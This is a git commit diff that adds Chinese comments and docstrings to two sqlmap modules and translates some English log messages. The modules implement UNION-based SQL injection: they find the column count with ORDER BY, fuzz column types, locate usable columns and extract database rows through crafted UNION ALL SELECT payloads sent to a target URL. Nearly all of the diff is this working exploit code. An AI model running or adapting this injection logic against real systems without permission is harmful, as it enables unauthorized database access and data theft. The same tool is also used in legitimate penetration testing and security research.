add comments to union

wang 3 months ago
parent df472ac52d
commit 165108186d

@ -5,68 +5,96 @@ Copyright (c) 2006-2024 sqlmap developers (
See the file 'LICENSE' for copying permission
import itertools
import logging
import random
import re
from lib.core.agent import agent
from lib.core.common import average
from lib.core.common import Backend
from lib.core.common import getPublicTypeMembers
from lib.core.common import isNullValue
from lib.core.common import listToStrValue
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import removeReflectiveValues
from lib.core.common import setTechnique
from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
from lib.core.common import stdev
from lib.core.common import wasLastResponseDBMSError
from lib.core.compat import xrange
from import conf
from import kb
from import logger
from import queries
from lib.core.decorators import stackedmethod
from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.enums import FUZZ_UNION_COLUMN
from lib.core.enums import PAYLOAD
from lib.core.settings import FUZZ_UNION_ERROR_REGEX
from lib.core.settings import FUZZ_UNION_MAX_COLUMNS
from lib.core.settings import LIMITED_ROWS_TEST_NUMBER
from lib.core.settings import MAX_RATIO
from lib.core.settings import MIN_RATIO
from lib.core.settings import MIN_STATISTICAL_RANGE
from lib.core.settings import MIN_UNION_RESPONSES
from lib.core.settings import NULL
from lib.core.settings import ORDER_BY_MAX
from lib.core.settings import ORDER_BY_STEP
from lib.core.settings import UNION_MIN_RESPONSE_CHARS
from lib.core.settings import UNION_STDEV_COEFF
from lib.core.unescaper import unescaper
from lib.request.comparison import comparison
from lib.request.connect import Connect as Request
# 导入所需的Python标准库和自定义模块
import itertools # 用于创建迭代器
import logging # 用于日志记录
import random # 用于生成随机数
import re # 用于正则表达式操作
# 导入自定义的工具函数和类
from lib.core.agent import agent # SQL注入代理模块
from lib.core.common import average # 计算平均值
from lib.core.common import Backend # 数据库后端
from lib.core.common import getPublicTypeMembers # 获取公共类型成员
from lib.core.common import isNullValue # 判断是否为空值
from lib.core.common import listToStrValue # 列表转字符串
from lib.core.common import popValue # 弹出值
from lib.core.common import pushValue # 压入值
from lib.core.common import randomInt # 生成随机整数
from lib.core.common import randomStr # 生成随机字符串
from lib.core.common import readInput # 读取用户输入
from lib.core.common import removeReflectiveValues # 移除反射值
from lib.core.common import setTechnique # 设置注入技术
from lib.core.common import singleTimeLogMessage # 单次日志消息
from lib.core.common import singleTimeWarnMessage # 单次警告消息
from lib.core.common import stdev # 计算标准差
from lib.core.common import wasLastResponseDBMSError # 检查上次响应是否为数据库错误
from lib.core.compat import xrange # 兼容Python2/3的range函数
from import conf # 配置数据
from import kb # 知识库数据
from import logger # 日志记录器
from import queries # SQL查询语句
from lib.core.decorators import stackedmethod # 堆栈方法装饰器
from lib.core.dicts import FROM_DUMMY_TABLE # 虚拟表字典
from lib.core.enums import FUZZ_UNION_COLUMN # UNION列模糊测试枚举
from lib.core.enums import PAYLOAD # 载荷类型枚举
from lib.core.settings import FUZZ_UNION_ERROR_REGEX # UNION错误正则表达式
from lib.core.settings import FUZZ_UNION_MAX_COLUMNS # UNION最大列数
from lib.core.settings import LIMITED_ROWS_TEST_NUMBER # 有限行测试数
from lib.core.settings import MAX_RATIO # 最大比率
from lib.core.settings import MIN_RATIO # 最小比率
from lib.core.settings import MIN_STATISTICAL_RANGE # 最小统计范围
from lib.core.settings import MIN_UNION_RESPONSES # 最小UNION响应数
from lib.core.settings import NULL # NULL值常量
from lib.core.settings import ORDER_BY_MAX # ORDER BY最大值
from lib.core.settings import ORDER_BY_STEP # ORDER BY步长
from lib.core.settings import UNION_MIN_RESPONSE_CHARS # UNION最小响应字符数
from lib.core.settings import UNION_STDEV_COEFF # UNION标准差系数
from lib.core.unescaper import unescaper # SQL转义处理器
from lib.request.comparison import comparison # 响应比较
from lib.request.connect import Connect as Request # HTTP请求处理
def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
Finds number of columns affected by UNION based injection
comment - SQL注释
place - 注入点位置
parameter - 注入参数
value - 参数值
prefix - SQL前缀
suffix - SQL后缀
where - 注入位置(默认为原始位置)
retVal = None
def _orderByTechnique(lowerCount=None, upperCount=None):
使用ORDER BY技术来确定列数
lowerCount - 最小列数
upperCount - 最大列数
def _orderByTest(cols):
测试指定列数的ORDER BY语句是否有效
query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
return not any(, page or "", re.I) and not, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or"data types cannot be compared or sorted", page or "", re.I) is not None
# 如果ORDER BY 1成功但ORDER BY随机大数失败,说明ORDER BY技术可用
if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1):
infoMsg = "'ORDER BY' technique appears to be usable. "
infoMsg += "This should reduce the time needed "
@ -75,6 +103,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
infoMsg += "range for current UNION query injection technique test"
# 二分查找确定准确的列数
lowCols, highCols = 1 if lowerCount is None else lowerCount, ORDER_BY_STEP if upperCount is None else upperCount
found = None
while not found:
@ -97,12 +126,14 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
return found
# 保存当前错误状态
items, ratios = [], []
kb.errorIsNone = False
lowerCount, upperCount = conf.uColsStart, conf.uColsStop
if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols): # Note: ORDER BY is not bullet-proof
# 如果ORDER BY列数未知且起始列为1或指定了列数,尝试使用ORDER BY技术
if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols):
found = _orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique()
if found:
@ -113,12 +144,14 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
elif kb.futileUnion:
return None
# 确保测试范围足够大
if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
upperCount = lowerCount + MIN_UNION_RESPONSES
min_, max_ = MAX_RATIO, MIN_RATIO
pages = {}
# 对每个可能的列数进行测试
for count in xrange(lowerCount, upperCount + 1):
query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
@ -127,11 +160,13 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
if not isNullValue(kb.uChar):
pages[count] = page
# 计算响应相似度
ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO
min_, max_ = min(min_, ratio), max(max_, ratio)
items.append((count, ratio))
# 如果使用了特定字符进行UNION注入测试
if not isNullValue(kb.uChar):
value = re.escape(kb.uChar.strip("'"))
for regex in (value, r'>\s*%s\s*<' % value):
@ -140,6 +175,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
retVal = contains[0]
# 如果没有找到明确的列数,使用统计分析方法
if not retVal:
if min_ in ratios:
@ -154,6 +190,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
elif item[1] == max_:
maxItem = item
# 根据响应相似度的分布确定列数
if all(_ == min_ and _ != max_ for _ in ratios):
retVal = maxItem[0]
@ -175,6 +212,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
kb.errorIsNone = popValue()
# 如果找到了列数,输出信息
if retVal:
infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal
singleTimeLogMessage(infoMsg, logging.INFO, re.sub(r"\d+", 'N', infoMsg))
@ -182,14 +220,29 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
return retVal
def _fuzzUnionCols(place, parameter, prefix, suffix):
place - 注入点位置
parameter - 注入参数
prefix - SQL前缀
suffix - SQL后缀
retVal = None
# 如果已识别数据库类型且页面模板中没有UNION错误,且知道ORDER BY列数
if Backend.getIdentifiedDbms() and not, kb.pageTemplate or "") and kb.orderByColumns:
comment = queries[Backend.getIdentifiedDbms()].comment.query
# 获取所有可能的列类型组合
choices = getPublicTypeMembers(FUZZ_UNION_COLUMN, True)
# 测试每种列类型组合
for candidate in itertools.product(choices, repeat=kb.orderByColumns):
if retVal:
@ -198,11 +251,13 @@ def _fuzzUnionCols(place, parameter, prefix, suffix):
candidate = [_.replace(FUZZ_UNION_COLUMN.INTEGER, str(randomInt())).replace(FUZZ_UNION_COLUMN.STRING, "'%s'" % randomStr(20)) for _ in candidate]
# 构造并测试UNION查询
query = agent.prefixQuery("UNION ALL SELECT %s%s" % (','.join(candidate), FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")), prefix=prefix)
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=PAYLOAD.WHERE.NEGATIVE)
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
# 如果没有UNION错误,检查字符串列是否在响应中
if not, page or ""):
for column in candidate:
if column.startswith("'") and column.strip("'") in (page or ""):
@ -212,66 +267,82 @@ def _fuzzUnionCols(place, parameter, prefix, suffix):
return retVal
def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
comment - SQL注释
place - 注入点位置
parameter - 注入参数
prefix - SQL前缀
suffix - SQL后缀
count - 列数
where - 注入位置
(有效载荷, 注入向量)元组
validPayload = None
vector = None
# 生成所有可能的列位置
positions = [_ for _ in xrange(0, count)]
# Unbiased approach for searching appropriate usable column
# 随机打乱位置顺序,以避免偏差
# 使用两种不同长度的随机字符串进行测试
if vector:
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target URL is
# affected by an exploitable union SQL injection vulnerability
# 测试每个列位置
for position in positions:
# Prepare expression with delimiters
# 准备带分隔符的测试字符串
randQuery = randomStr(charCount)
phrase = ("%s%s%s" % (kb.chars.start, randQuery, kb.chars.stop)).lower()
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.escape(randQueryProcessed)
# Forge the union SQL injection request
# 构造UNION注入查询
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
# 发送请求并检查响应
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower()
# 如果测试字符串在响应中,说明找到了可用的列位置
if content and phrase in content:
validPayload = payload
kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, conf.forcePartial, kb.tableFrom, kb.unionTemplate)
# 如果是在原始位置测试,进行额外确认
# Prepare expression with delimiters
# 准备第二个测试字符串
randQuery2 = randomStr(charCount)
phrase2 = ("%s%s%s" % (kb.chars.start, randQuery2, kb.chars.stop)).lower()
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)
# Confirm that it is a full union SQL injection
# 使用多个UNION测试完整性
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
content = ("%s%s" % (page or "", listToStrValue(headers.headers if headers else None) or "")).lower()
# 如果两个测试字符串都不在响应中,切换到部分模式
if not all(_ in content for _ in (phrase, phrase2)):
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate)
elif not kb.unionDuplicates:
# 测试行数限制
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
# Check for limited row output
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower()
if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER:
@ -279,6 +350,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate)
# 检查是否是UNION/错误混合注入情况
unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError()
if unionErrorCase and count > 1:
@ -292,15 +364,27 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
return validPayload, vector
def _unionConfirm(comment, place, parameter, prefix, suffix, count):
确认UNION SQL注入并获取精确的列位置
comment - SQL注释
place - 注入点位置
parameter - 注入参数
prefix - SQL前缀
suffix - SQL后缀
count - 列数
(有效载荷, 注入向量)元组
validPayload = None
vector = None
# Confirm the union SQL injection and get the exact column
# position which can be used to extract data
# 在原始位置确认UNION注入
validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count)
# Assure that the above function found the exploitable full union
# SQL injection position
# 如果原始位置未找到,尝试在否定位置确认
if not validPayload:
validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)
@ -308,9 +392,19 @@ def _unionConfirm(comment, place, parameter, prefix, suffix, count):
def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
This method tests if the target URL is affected by an union
SQL injection vulnerability. The test is done up to 50 columns
on the target database table
通过字符暴力测试目标URL是否存在UNION SQL注入漏洞
comment - SQL注释
place - 注入点位置
parameter - 注入参数
value - 参数值
prefix - SQL前缀
suffix - SQL后缀
(有效载荷, 注入向量)元组
validPayload = None
@ -319,7 +413,7 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
uChars = (conf.uChar, kb.uChar)
# In case that user explicitly stated number of columns affected
# 如果用户明确指定了列数
if conf.uColsStop == conf.uColsStart:
count = conf.uColsStart
@ -328,6 +422,7 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
if count:
validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
# 如果未找到有效载荷且未设置某些配置,尝试模糊测试
if not all((validPayload, vector)) and not all((conf.uChar, conf.dbms, kb.unionTemplate)):
if Backend.getIdentifiedDbms() and kb.orderByColumns and kb.orderByColumns < FUZZ_UNION_MAX_COLUMNS:
if kb.fuzzUnionTest is None:
@ -341,6 +436,7 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
warnMsg = "if UNION based SQL injection is not detected, "
warnMsg += "please consider "
# 如果NULL值注入不可用,提示尝试使用随机整数
if not conf.uChar and count > 1 and kb.uChar == NULL and conf.uValues is None:
message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] "
@ -351,6 +447,7 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
conf.uChar = kb.uChar = str(randomInt(2))
validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
# 提示强制指定数据库类型
if not conf.dbms:
if not conf.uChar:
warnMsg += "and/or try to force the "
@ -361,7 +458,8 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
if not all((validPayload, vector)) and not warnMsg.endswith("consider "):
if orderBy is None and kb.orderByColumns is not None and not all((validPayload, vector)): # discard ORDER BY results (not usable - e.g. maybe invalid altogether)
# 如果ORDER BY结果无效,丢弃并重试
if orderBy is None and kb.orderByColumns is not None and not all((validPayload, vector)):
conf.uChar, kb.uChar = uChars
validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
@ -370,10 +468,22 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
def unionTest(comment, place, parameter, value, prefix, suffix):
This method tests if the target URL is affected by an union
SQL injection vulnerability. The test is done up to 3*50 times
测试目标URL是否存在UNION SQL注入漏洞
comment - SQL注释
place - 注入点位置
parameter - 注入参数
value - 参数值
prefix - SQL前缀
suffix - SQL后缀
(有效载荷, 注入向量)元组
# 直连模式下不进行测试
@ -381,6 +491,7 @@ def unionTest(comment, place, parameter, value, prefix, suffix):
# 如果使用否定逻辑,保存当前状态
if negativeLogic:
@ -389,13 +500,16 @@ def unionTest(comment, place, parameter, value, prefix, suffix):
kb.negativeLogic = False
conf.string = conf.code = None
# 进行UNION注入测试
validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
# 恢复否定逻辑状态
if negativeLogic:
conf.code = popValue()
conf.string = popValue()
kb.negativeLogic = popValue()
# 移除载荷分隔符
if validPayload:
validPayload = agent.removePayloadDelimiters(validPayload)

@ -5,10 +5,12 @@ Copyright (c) 2006-2024 sqlmap developers (
See the file 'LICENSE' for copying permission
# 导入所需的模块
import json
import re
import time
# 导入sqlmap自定义模块
from lib.core.agent import agent
from lib.core.bigarray import BigArray
from lib.core.common import arrayizeValue
@ -63,48 +65,67 @@ from thirdparty import six
from thirdparty.odict import OrderedDict
def _oneShotUnionUse(expression, unpack=True, limited=False):
retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True) # as UNION data is stored raw unconverted
expression - SQL查询表达式
unpack - 是否需要解包结果
limited - 是否限制查询结果数量
# 从hashDB中检索缓存的结果
retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True)
# 获取当前线程数据
threadData = getCurrentThreadData()
threadData.resumed = retVal is not None
if retVal is None:
# 获取UNION注入向量
if not kb.jsonAggMode:
# 构造注入表达式
injExpression = unescaper.escape(agent.concatQuery(expression, unpack))
kb.unionDuplicates = vector[7]
kb.forcePartialUnion = vector[8]
# Note: introduced columns in
# 设置表名和UNION模板
kb.tableFrom = vector[9]
kb.unionTemplate = vector[10]
except IndexError:
# 构造UNION查询
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6]
# JSON聚合模式
injExpression = unescaper.escape(expression)
where = vector[6]
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False)
# 构造payload并发送请求
payload = agent.payload(newValue=query, where=where)
# Perform the request
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)
# 检查结果是否被强制转换为大写
if page and kb.chars.start.upper() in page and kb.chars.start not in page:
singleTimeWarnMessage("results seems to be upper-cased by force. sqlmap will automatically lower-case them")
page = page.lower()
# 增加UNION技术使用计数
# JSON聚合模式下的结果处理
if kb.jsonAggMode:
for _page in (page or "", (page or "").replace('\\"', '"')):
if Backend.isDbms(DBMS.MSSQL):
# MSSQL特定的JSON结果解析
output = extractRegexResult(r"%s(?P<result>.*)%s" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload))
if output:
@ -117,10 +138,12 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
retVal = getUnicode(retVal)
elif Backend.isDbms(DBMS.PGSQL):
# PostgreSQL特定的结果解析
output = extractRegexResult(r"(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload))
if output:
retVal = output
# 其他数据库的JSON结果解析
output = extractRegexResult(r"%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload))
if output:
@ -135,61 +158,74 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
if retVal:
# Parse the returned page to get the exact UNION-based
# SQL injection output
# 非JSON模式下的结果解析
def _(regex):
return firstNotNone(
extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE),
extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)
# Automatically patching last char trimming cases
# 自动修复最后一个字符被截断的情况
if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""):
warnMsg = "automatically patching output having last char trimmed"
warnMsg = "自动修复输出中最后一个字符被截断的情况"
page = page.replace(kb.chars.stop[:-1], kb.chars.stop)
retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop))
# 处理结果
if retVal is not None:
retVal = getUnicode(retVal, kb.pageEncoding)
# Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection
# MSSQL错误信息特殊处理
if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError():
retVal = htmlUnescape(retVal).replace("<br>", "\n")
# 将结果写入hashDB缓存
hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal)
elif not kb.jsonAggMode:
# 检查是否存在输出被截断的情况
trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start))
if trimmed:
warnMsg = "possible server trimmed output detected "
warnMsg += "(probably due to its length and/or content): "
warnMsg = "检测到可能的服务器截断输出 "
warnMsg += "(可能由于长度或内容导致): "
warnMsg += safecharencode(trimmed)
# 尝试移除ORDER BY子句重试
elif"ORDER BY [^ ]+\Z", expression):
debugMsg = "retrying failed SQL query without the ORDER BY clause"
debugMsg = "重试失败的SQL查询(不带ORDER BY子句)"
expression = re.sub(r"\s*ORDER BY [^ ]+\Z", "", expression)
retVal = _oneShotUnionUse(expression, unpack, limited)
elif kb.nchar and" AS N(CHAR|VARCHAR)", agent.nullAndCastField(expression)):
debugMsg = "turning off NATIONAL CHARACTER casting" # NOTE: in some cases there are "known" incompatibilities between original columns and NCHAR (e.g.
kb.nchar = False
retVal = _oneShotUnionUse(expression, unpack, limited)
# 从缓存获取结果时设置unionDuplicates
kb.unionDuplicates = vector[7]
return retVal
def configUnion(char=None, columns=None):
char - UNION分隔符
columns - UNION查询的列数范围
def _configUnionChar(char):
if not isinstance(char, six.string_types):
@ -199,6 +235,7 @@ def configUnion(char=None, columns=None):
kb.uChar = char.replace("[CHAR]", conf.uChar if isDigit(conf.uChar) else "'%s'" % conf.uChar.strip("'"))
def _configUnionCols(columns):
if not isinstance(columns, six.string_types):
@ -209,13 +246,12 @@ def configUnion(char=None, columns=None):
colsStart, colsStop = columns, columns
if not isDigit(colsStart) or not isDigit(colsStop):
raise SqlmapSyntaxException("--union-cols must be a range of integers")
raise SqlmapSyntaxException("--union-cols必须是整数范围")
conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop)
if conf.uColsStart > conf.uColsStop:
errMsg = "--union-cols range has to represent lower to "
errMsg += "higher number of columns"
errMsg = "--union-cols范围必须是从小到大的数字"
raise SqlmapSyntaxException(errMsg)
@ -223,13 +259,21 @@ def configUnion(char=None, columns=None):
def unionUse(expression, unpack=True, dump=False):
This function tests for an UNION SQL injection on the target
URL then call its subsidiary function to effectively perform an
UNION SQL injection on the affected URL
使用UNION SQL注入技术执行查询
expression - SQL查询表达式
unpack - 是否需要解包结果
dump - 是否在dump模式下执行
# 初始化UNION注入技术
# 初始化变量
abortedFlag = False
count = None
origExpr = expression
@ -237,32 +281,35 @@ def unionUse(expression, unpack=True, dump=False):
stopLimit = None
value = None
# 获取控制台宽度和开始时间
width = getConsoleWidth()
start = time.time()
# 解析表达式中的字段
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr)
# Set kb.partRun in case the engine is called from the API
# 设置部分运行标志(API模式)
kb.partRun = getPartRun(alias=False) if conf.api else None
# 移除ORDER BY子句(如果存在)
if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper():
# Removed ORDER BY clause because UNION does not play well with it
expression = re.sub(r"(?i)\s*ORDER BY\s+[\w,]+", "", expression)
debugMsg = "stripping ORDER BY clause from statement because "
debugMsg += "it does not play well with UNION query SQL injection"
debugMsg = "由于ORDER BY子句与UNION查询不兼容,已将其移除"
# 检查是否可以使用JSON聚合模式
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL, DBMS.SQLITE) and expressionFields and not any((conf.binaryFields, conf.limitStart, conf.limitStop, conf.forcePartial, conf.disableJson)):
match ="SELECT\s*(.+?)\bFROM", expression, re.I)
if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression) and not"\b(MIN|MAX|COUNT)\(", expression):
kb.jsonAggMode = True
# 根据不同数据库构造JSON聚合查询
if Backend.isDbms(DBMS.MYSQL):
query = expression.replace(expressionFields, "CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')" % (kb.chars.start, kb.chars.delimiter, expressionFields, kb.chars.stop), 1)
elif Backend.isDbms(DBMS.ORACLE):
query = expression.replace(expressionFields, "'%s'||JSON_ARRAYAGG(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(expressionFieldsList), kb.chars.stop), 1)
elif Backend.isDbms(DBMS.SQLITE):
query = expression.replace(expressionFields, "'%s'||JSON_GROUP_ARRAY(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1)
elif Backend.isDbms(DBMS.PGSQL): # Note: ARRAY_AGG does CSV alike output, thus enclosing start/end inside each item
elif Backend.isDbms(DBMS.PGSQL):
query = expression.replace(expressionFields, "ARRAY_AGG('%s'||%s||'%s')::text" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1)
elif Backend.isDbms(DBMS.MSSQL):
query = "'%s'+(%s FOR JSON AUTO, INCLUDE_NULL_VALUES)+'%s'" % (kb.chars.start, expression, kb.chars.stop)
@ -270,16 +317,13 @@ def unionUse(expression, unpack=True, dump=False):
value = parseUnionPage(output)
kb.jsonAggMode = False
# We have to check if the SQL query might return multiple entries
# if the technique is partial UNION query and in such case forge the
# SQL limiting the query output one entry at a time
# NOTE: we assume that only queries that get data from a table can
# return multiple entries
# 检查是否需要分页查询
if value is None and ([PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or conf.forcePartial or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not, expression, re.I):
# 添加LIMIT条件
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)
if limitCond:
# Count the number of SQL query entries output
# 计算查询结果总数
countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)
if " ORDER BY " in countedExpression.upper():
@ -295,36 +339,33 @@ def unionUse(expression, unpack=True, dump=False):
stopLimit = int(count)
debugMsg = "used SQL query returns "
debugMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry")
debugMsg = "SQL查询返回 "
debugMsg += "%d %s" % (stopLimit, "条结果" if stopLimit > 1 else "条结果")
elif count and (not isinstance(count, six.string_types) or not count.isdigit()):
warnMsg = "it was not possible to count the number "
warnMsg += "of entries for the SQL query provided. "
warnMsg += "sqlmap will assume that it returns only "
warnMsg += "one entry"
warnMsg = "无法计算SQL查询的结果数量。"
warnMsg += "sqlmap将假设只返回一条结果"
stopLimit = 1
elif not isNumPosStrValue(count):
if not count:
warnMsg = "the SQL query provided does not "
warnMsg += "return any output"
warnMsg = "SQL查询没有返回任何结果"
value = [] # for empty tables
value = [] # 空表
return value
# 如果结果数大于1,使用多线程处理
if isNumPosStrValue(count) and int(count) > 1:
threadData = getCurrentThreadData()
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
errMsg = "边界限制 (%d,%d) 太大。请使用'--fresh-queries'重新运行" % (startLimit, stopLimit)
raise SqlmapDataException(errMsg)
numThreads = min(conf.threads, (stopLimit - startLimit))
@ -339,12 +380,15 @@ def unionUse(expression, unpack=True, dump=False):
kb.suppressResumeInfo = True
debugMsg = "suppressing possible resume console info for "
debugMsg += "large number of rows as it might take too long"
debugMsg = "由于行数较多,抑制可能的恢复控制台信息"
def unionThread():
threadData = getCurrentThreadData()
while kb.threadContinue:
@ -355,6 +399,7 @@ def unionUse(expression, unpack=True, dump=False):
except StopIteration:
# 根据数据库类型处理字段
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
field = expressionFieldsList[0]
elif Backend.isDbms(DBMS.ORACLE):
@ -362,6 +407,7 @@ def unionUse(expression, unpack=True, dump=False):
field = None
# 构造限制查询
limitedExpr = agent.limitQuery(num, expression, field)
output = _oneShotUnionUse(limitedExpr, unpack, True)
@ -376,7 +422,7 @@ def unionUse(expression, unpack=True, dump=False):
if threadData.shared.showEta:
if isListLike(items):
# in case that we requested N columns and we get M!=N then we have to filter a bit
